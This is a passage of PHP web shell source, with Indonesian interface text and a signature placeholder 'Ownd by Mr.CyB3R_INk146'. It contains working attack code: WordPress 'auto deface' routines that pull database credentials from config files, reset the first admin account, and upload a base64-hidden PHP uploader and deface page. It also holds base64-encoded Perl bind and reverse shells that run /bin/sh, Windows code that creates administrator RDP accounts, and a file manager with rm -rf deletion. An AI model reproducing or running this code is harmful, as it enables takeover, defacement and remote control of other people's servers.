  1746. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1747. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1748. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1749. curl_setopt($ch, CURLOPT_POST, 1);
  1750. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1751. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1752. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1753. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1754. $data = curl_exec($ch);
  1755. curl_close($ch);
  1756. return $data;
  1757. }
  1758. $scan = $_POST['link_config'];
  1759. $link_config = scandir($scan);
  1760. $script = htmlspecialchars($_POST['script']);
  1761. $user = "ink";
  1762. $pass = "ink";
  1763. $passx = md5($pass);
  1764. foreach($link_config as $dir_config) {
  1765. if(!is_file("$scan/$dir_config")) continue;
  1766. $config = file_get_contents("$scan/$dir_config");
  1767. if(preg_match("/WordPress/", $config)) {
  1768. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1769. $dbuser = ambilkata($config,"DB_USER', '","'");
  1770. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1771. $dbname = ambilkata($config,"DB_NAME', '","'");
  1772. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1773. $prefix = $dbprefix."users";
  1774. $option = $dbprefix."options";
  1775. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1776. $db = mysql_select_db($dbname);
  1777. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1778. $result = mysql_fetch_array($q);
  1779. $id = $result[ID];
  1780. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1781. $result2 = mysql_fetch_array($q2);
  1782. $target = $result2[option_value];
  1783. if($target == '') {
  1784. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1785. } else {
  1786. echo "[+] $target <br>";
  1787. }
  1788. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1789. if(!$conn OR !$db OR !$update) {
  1790. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1791. mysql_close($conn);
  1792. } else {
  1793. $site = "$target/wp-login.php";
  1794. $site2 = "$target/wp-admin/theme-install.php?upload";
  1795. $b1 = anucurl($site2);
  1796. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1797. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1798. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1799. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1800. $www = "m.php";
  1801. $fp5 = fopen($www,"w");
  1802. fputs($fp5,$upload3);
  1803. $post2 = array(
  1804. "_wpnonce" => "$anu2",
  1805. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1806. "themezip" => "@$www",
  1807. "install-theme-submit" => "Install Now",
  1808. );
  1809. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1810. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1811. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1812. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1813. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1814. curl_setopt($ch, CURLOPT_POST, 1);
  1815. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1816. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1817. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1818. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1819. $data3 = curl_exec($ch);
  1820. curl_close($ch);
  1821. $y = date("Y");
  1822. $m = date("m");
  1823. $namafile = "id.php";
  1824. $fpi = fopen($namafile,"w");
  1825. fputs($fpi,$script);
  1826. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1827. curl_setopt($ch6, CURLOPT_POST, true);
  1828. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1829. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1830. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1831. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1832. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1833. $postResult = curl_exec($ch6);
  1834. curl_close($ch6);
  1835. $as = "$target/k.php";
  1836. $bs = anucurl($as);
  1837. if(preg_match("#$script#is", $bs)) {
  1838. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1839. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1840. } else {
  1841. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1842. echo "[!!] coba aja manual: <br>";
  1843. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1844. echo "[+] username: <font color=lime>$user</font><br>";
  1845. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1846. }
  1847. mysql_close($conn);
  1848. }
  1849. }
  1850. }
  1851. } else {
  1852. echo "<center><h1>WordPress Auto Deface</h1>
  1853. <form method='post'>
  1854. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1855. <input type='text' name='script' height='10' size='50' placeholder='Ownd by Mr.CyB3R_INk146' required><br>
  1856. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1857. </form>
  1858. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1859. </center>";
  1860. }
  1861. } elseif($_GET['do'] == 'auto_dwp2') {
  1862. if($_POST['auto_deface_wp']) {
  1863. function anucurl($sites) {
  1864. $ch = curl_init($sites);
  1865. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1866. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1867. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1868. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1869. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1870. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1871. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1872. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1873. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1874. $data = curl_exec($ch);
  1875. curl_close($ch);
  1876. return $data;
  1877. }
  1878. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1879. $post = array(
  1880. "log" => "$userr",
  1881. "pwd" => "$pass",
  1882. "rememberme" => "forever",
  1883. "wp-submit" => "$wp_submit",
  1884. "redirect_to" => "$web",
  1885. "testcookie" => "1",
  1886. );
  1887. $ch = curl_init($cek);
  1888. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1889. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1890. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1891. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1892. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1893. curl_setopt($ch, CURLOPT_POST, 1);
  1894. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1895. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1896. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1897. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1898. $data = curl_exec($ch);
  1899. curl_close($ch);
  1900. return $data;
  1901. }
  1902. $link = explode("\r\n", $_POST['link']);
  1903. $script = htmlspecialchars($_POST['script']);
  1904. $user = "ink";
  1905. $pass = "ink";
  1906. $passx = md5($pass);
  1907. foreach($link as $dir_config) {
  1908. $config = anucurl($dir_config);
  1909. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1910. $dbuser = ambilkata($config,"DB_USER', '","'");
  1911. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1912. $dbname = ambilkata($config,"DB_NAME', '","'");
  1913. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1914. $prefix = $dbprefix."users";
  1915. $option = $dbprefix."options";
  1916. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1917. $db = mysql_select_db($dbname);
  1918. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1919. $result = mysql_fetch_array($q);
  1920. $id = $result[ID];
  1921. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1922. $result2 = mysql_fetch_array($q2);
  1923. $target = $result2[option_value];
  1924. if($target == '') {
  1925. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1926. } else {
  1927. echo "[+] $target <br>";
  1928. }
  1929. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1930. if(!$conn OR !$db OR !$update) {
  1931. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1932. mysql_close($conn);
  1933. } else {
  1934. $site = "$target/wp-login.php";
  1935. $site2 = "$target/wp-admin/theme-install.php?upload";
  1936. $b1 = anucurl($site2);
  1937. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1938. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1939. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1940. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1941. $www = "m.php";
  1942. $fp5 = fopen($www,"w");
  1943. fputs($fp5,$upload3);
  1944. $post2 = array(
  1945. "_wpnonce" => "$anu2",
  1946. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1947. "themezip" => "@$www",
  1948. "install-theme-submit" => "Install Now",
  1949. );
  1950. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1951. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1952. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1953. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1954. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1955. curl_setopt($ch, CURLOPT_POST, 1);
  1956. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1957. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1958. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1959. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1960. $data3 = curl_exec($ch);
  1961. curl_close($ch);
  1962. $y = date("Y");
  1963. $m = date("m");
  1964. $namafile = "id.php";
  1965. $fpi = fopen($namafile,"w");
  1966. fputs($fpi,$script);
  1967. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1968. curl_setopt($ch6, CURLOPT_POST, true);
  1969. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1970. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1971. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1972. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1973. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1974. $postResult = curl_exec($ch6);
  1975. curl_close($ch6);
  1976. $as = "$target/k.php";
  1977. $bs = anucurl($as);
  1978. if(preg_match("#$script#is", $bs)) {
  1979. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1980. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1981. } else {
  1982. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1983. echo "[!!] coba aja manual: <br>";
  1984. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1985. echo "[+] username: <font color=lime>$user</font><br>";
  1986. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1987. }
  1988. mysql_close($conn);
  1989. }
  1990. }
  1991. } else {
  1992. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1993. <form method='post'>
  1994. Link Config: <br>
  1995. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1996. <input type='text' name='script' height='10' size='50' placeholder='Ownd by Mr.CyB3R_INk146' required><br>
  1997. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1998. </form></center>";
  1999. }
  2000. } elseif($_GET['do'] == 'network') {
  2001. echo "<form method='post'>
  2002. <u>Bind Port:</u> <br>
  2003. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2004. <input type='submit' name='sub_bp' value='>>'>
  2005. </form>
  2006. <form method='post'>
  2007. <u>Back Connect:</u> <br>
  2008. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2009. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2010. <input type='submit' name='sub_bc' value='>>'>
  2011. </form>";
  2012. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2013. if(isset($_POST['sub_bp'])) {
  2014. $f_bp = fopen("/tmp/bp.pl", "w");
  2015. fwrite($f_bp, base64_decode($bind_port_p));
  2016. fclose($f_bp);
  2017.  
  2018. $port = $_POST['port_bind'];
  2019. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2020. sleep(1);
  2021. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2022. unlink("/tmp/bp.pl");
  2023. }
  2024. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2025. if(isset($_POST['sub_bc'])) {
  2026. $f_bc = fopen("/tmp/bc.pl", "w");
  2027. fwrite($f_bc, base64_decode($bind_connect_p));
  2028. fclose($f_bc);
  2029.  
  2030. $ipbc = $_POST['ip_bc'];
  2031. $port = $_POST['port_bc'];
  2032. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2033. sleep(1);
  2034. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2035. unlink("/tmp/bc.pl");
  2036. }
  2037. } elseif($_GET['do'] == 'krdp_shell') {
  2038. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2039. if($_POST['create']) {
  2040. $user = htmlspecialchars($_POST['user']);
  2041. $pass = htmlspecialchars($_POST['pass']);
  2042. if(preg_match("/$user/", exe("net user"))) {
  2043. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  2044. } else {
  2045. $add_user = exe("net user $user $pass /add");
  2046. $add_groups1 = exe("net localgroup Administrators $user /add");
  2047. $add_groups2 = exe("net localgroup Administrator $user /add");
  2048. $add_groups3 = exe("net localgroup Administrateur $user /add");
  2049. echo "[ RDP ACCOUNT INFO ]<br>
  2050. ------------------------------<br>
  2051. IP: <font color=lime>".$ip."</font><br>
  2052. Username: <font color=lime>$user</font><br>
  2053. Password: <font color=lime>$pass</font><br>
  2054. ------------------------------<br><br>
  2055. [ STATUS ]<br>
  2056. ------------------------------<br>
  2057. ";
  2058. if($add_user) {
  2059. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  2060. } else {
  2061. echo "[add user] -> <font color='red'>Gagal</font><br>";
  2062. }
  2063. if($add_groups1) {
  2064. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  2065. } elseif($add_groups2) {
  2066. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  2067. } elseif($add_groups3) {
  2068. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  2069. } else {
  2070. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2071. }
  2072. echo "------------------------------<br>";
  2073. }
  2074. } elseif($_POST['s_opsi']) {
  2075. $user = htmlspecialchars($_POST['r_user']);
  2076. if($_POST['opsi'] == '1') {
  2077. $cek = exe("net user $user");
  2078. echo "Checking username <font color=lime>$user</font> ....... ";
  2079. if(preg_match("/$user/", $cek)) {
  2080. echo "[ <font color=lime>Sudah ada</font> ]<br>
  2081. ------------------------------<br><br>
  2082. <pre>$cek</pre>";
  2083. } else {
  2084. echo "[ <font color=red>belum ada</font> ]";
  2085. }
  2086. } elseif($_POST['opsi'] == '2') {
  2087. $cek = exe("net user $user ink");
  2088. if(preg_match("/$user/", exe("net user"))) {
  2089. echo "[change password: <font color=red>ink</font>] -> ";
  2090. if($cek) {
  2091. echo "<font color=lime>Berhasil</font>";
  2092. } else {
  2093. echo "<font color=red>Gagal</font>";
  2094. }
  2095. } else {
  2096. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2097. }
  2098. } elseif($_POST['opsi'] == '3') {
  2099. $cek = exe("net user $user /DELETE");
  2100. if(preg_match("/$user/", exe("net user"))) {
  2101. echo "[remove user: <font color=lime>$user</font>] -> ";
  2102. if($cek) {
  2103. echo "<font color=lime>Berhasil</font>";
  2104. } else {
  2105. echo "<font color=red>Gagal</font>";
  2106. }
  2107. } else {
  2108. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  2109. }
  2110. } else {
  2111. //
  2112. }
  2113. } else {
  2114. echo "-- Create RDP --<br>
  2115. <form method='post'>
  2116. <input type='text' name='user' placeholder='username' value='ink' required>
  2117. <input type='text' name='pass' placeholder='password' value='ink' required>
  2118. <input type='submit' name='create' value='>>'>
  2119. </form>
  2120. -- Option --<br>
  2121. <form method='post'>
  2122. <input type='text' name='r_user' placeholder='username' required>
  2123. <select name='opsi'>
  2124. <option value='1'>Cek Username</option>
  2125. <option value='2'>Ubah Password</option>
  2126. <option value='3'>Hapus Username</option>
  2127. </select>
  2128. <input type='submit' name='s_opsi' value='>>'>
  2129. </form>
  2130. ";
  2131. }
  2132. } else {
  2133. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2134. }
  2135. } elseif($_GET['act'] == 'newfile') {
  2136. if($_POST['new_save_file']) {
  2137. $newfile = htmlspecialchars($_POST['newfile']);
  2138. $fopen = fopen($newfile, "a+");
  2139. if($fopen) {
  2140. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2141. } else {
  2142. $act = "<font color=red>permission denied</font>";
  2143. }
  2144. }
  2145. echo $act;
  2146. echo "<form method='post'>
  2147. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2148. <input type='submit' name='new_save_file' value='Submit'>
  2149. </form>";
  2150. } elseif($_GET['act'] == 'newfolder') {
  2151. if($_POST['new_save_folder']) {
  2152. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2153. if(!mkdir($new_folder)) {
  2154. $act = "<font color=red>permission denied</font>";
  2155. } else {
  2156. $act = "<script>window.location='?dir=".$dir."';</script>";
  2157. }
  2158. }
  2159. echo $act;
  2160. echo "<form method='post'>
  2161. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2162. <input type='submit' name='new_save_folder' value='Submit'>
  2163. </form>";
  2164. } elseif($_GET['act'] == 'rename_dir') {
  2165. if($_POST['dir_rename']) {
  2166. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2167. if($dir_rename) {
  2168. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2169. } else {
  2170. $act = "<font color=red>permission denied</font>";
  2171. }
  2172. echo "".$act."<br>";
  2173. }
  2174. echo "<form method='post'>
  2175. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2176. <input type='submit' name='dir_rename' value='rename'>
  2177. </form>";
  2178. } elseif($_GET['act'] == 'delete_dir') {
  2179. if(is_dir($dir)) {
  2180. if(is_writable($dir)) {
  2181. @rmdir($dir);
  2182. @exe("rm -rf $dir");
  2183. @exe("rmdir /s /q $dir");
  2184. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2185. } else {
  2186. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2187. }
  2188. }
  2189. echo $act;
  2190. } elseif($_GET['act'] == 'view') {
  2191. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2192. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2193. } elseif($_GET['act'] == 'edit') {
  2194. if($_POST['save']) {
  2195. $save = file_put_contents($_GET['file'], $_POST['src']);
  2196. if($save) {
  2197. $act = "<font color=lime>Saved!</font>";
  2198. } else {
  2199. $act = "<font color=red>permission denied</font>";
  2200. }
  2201. echo "".$act."<br>";
  2202. }
  2203. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2204. echo "<form method='post'>
  2205. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2206. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2207. </form>";
  2208. } elseif($_GET['act'] == 'rename') {
  2209. if($_POST['do_rename']) {
  2210. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2211. if($rename) {
  2212. $act = "<script>window.location='?dir=".$dir."';</script>";
  2213. } else {
  2214. $act = "<font color=red>permission denied</font>";
  2215. }
  2216. echo "".$act."<br>";
  2217. }
  2218. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2219. echo "<form method='post'>
  2220. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2221. <input type='submit' name='do_rename' value='rename'>
  2222. </form>";
  2223. } elseif($_GET['act'] == 'delete') {
  2224. $delete = unlink($_GET['file']);
  2225. if($delete) {
  2226. $act = "<script>window.location='?dir=".$dir."';</script>";
  2227. } else {
  2228. $act = "<font color=red>permission denied</font>";
  2229. }
  2230. echo $act;
  2231. } else {
  2232. if(is_dir($dir) === true) {
  2233. if(!is_readable($dir)) {
  2234. echo "<font color=red>can't open directory. ( not readable )</font>";
  2235. } else {
  2236. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2237. <tr>
  2238. <th class="th_home"><center>Name</center></th>
  2239. <th class="th_home"><center>Type</center></th>
  2240. <th class="th_home"><center>Size</center></th>
  2241. <th class="th_home"><center>Last Modified</center></th>
  2242. <th class="th_home"><center>Owner/Group</center></th>
  2243. <th class="th_home"><center>Permission</center></th>
  2244. <th class="th_home"><center>Action</center></th>
  2245. </tr>';
  2246. $scandir = scandir($dir);
  2247. foreach($scandir as $dirx) {
  2248. $dtype = filetype("$dir/$dirx");
  2249. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2250. if(function_exists('posix_getpwuid')) {
  2251. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2252. $downer = $downer['name'];
  2253. } else {
  2254. //$downer = $uid;
  2255. $downer = fileowner("$dir/$dirx");
  2256. }
  2257. if(function_exists('posix_getgrgid')) {
  2258. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2259. $dgrp = $dgrp['name'];
  2260. } else {
  2261. $dgrp = filegroup("$dir/$dirx");
  2262. }
  2263. if(!is_dir("$dir/$dirx")) continue;
  2264. if($dirx === '..') {
  2265. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2266. } elseif($dirx === '.') {
  2267. $href = "<a href='?dir=$dir'>$dirx</a>";
  2268. } else {
  2269. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2270. }
  2271. if($dirx === '.' || $dirx === '..') {
  2272. $act_dir = "<a href='?act=newfile&dir=$dir'>New File</a> | <a href='?act=newfolder&dir=$dir'>New Folder</a>";
  2273. } else {
  2274. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>Rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>Delete</a>";
  2275. }
  2276. echo "<tr>";
  2277. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2278. echo "<td class='td_home'><center>$dtype</center></td>";
  2279. echo "<td class='td_home'><center>-</center></th></td>";
  2280. echo "<td class='td_home'><center>$dtime</center></td>";
